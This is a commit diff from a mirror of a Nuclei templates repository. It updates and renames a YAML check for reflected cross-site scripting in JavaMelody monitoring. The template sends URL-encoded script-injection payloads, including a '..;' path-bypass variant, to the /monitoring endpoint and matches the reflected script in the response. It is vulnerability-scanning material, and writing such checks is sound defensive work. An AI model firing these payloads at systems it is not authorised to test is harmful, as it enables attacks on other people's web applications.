daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update and rename vulnerabilities/JavaMelody/java-melody-xss.yaml to vulnerabilities/other/java-melody-xss.yaml

patch-1
Prince Chaddha 2022-01-24 13:15:23 +05:30 committed by GitHub
parent de36b9a5c6
commit e5b30f69d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
vulnerabilities/JavaMelody/java-melody-xss.yaml → vulnerabilities/other/java-melody-xss.yaml
View File

@ -1,4 +1,4 @@
id: java-melody-reflected-xss
id: java-melody-xss
info:
name: JavaMelody Monitoring XSS
@ -6,26 +6,26 @@ info:
severity: medium
description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
reference:
- https://github.com/javamelody/javamelody/pull/555
- https://github.com/Hurdano/JavaMelody-XSS
- https://github.com/javamelody/javamelody/pull/555
tags: xss,javamelody
requests:
- method: GET
path:
- '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2fscript%3E%3Cscript%3Ealert(31337.37)%3C/script%3E'
- '{{BaseURL}}/..%3B/monitoring?part=graph&graph=usedMemory%3C%2fscript%3E%3Cscript%3Ealert(31337.37)%3C/script%3E'
- '{{BaseURL}}/monitoring?action=clear_counter&counter=%3Cscript%3Ealert(31337.37)%3C/script%3E'
- '{{BaseURL}}/..%3B/monitoring?action=clear_counter&counter=%3Cscript%3Ealert(31337.37)%3C/script%3E'
- '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'alert(31337.37)'
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- 'JavaMelody'
- text/html
- type: status
status:
- 200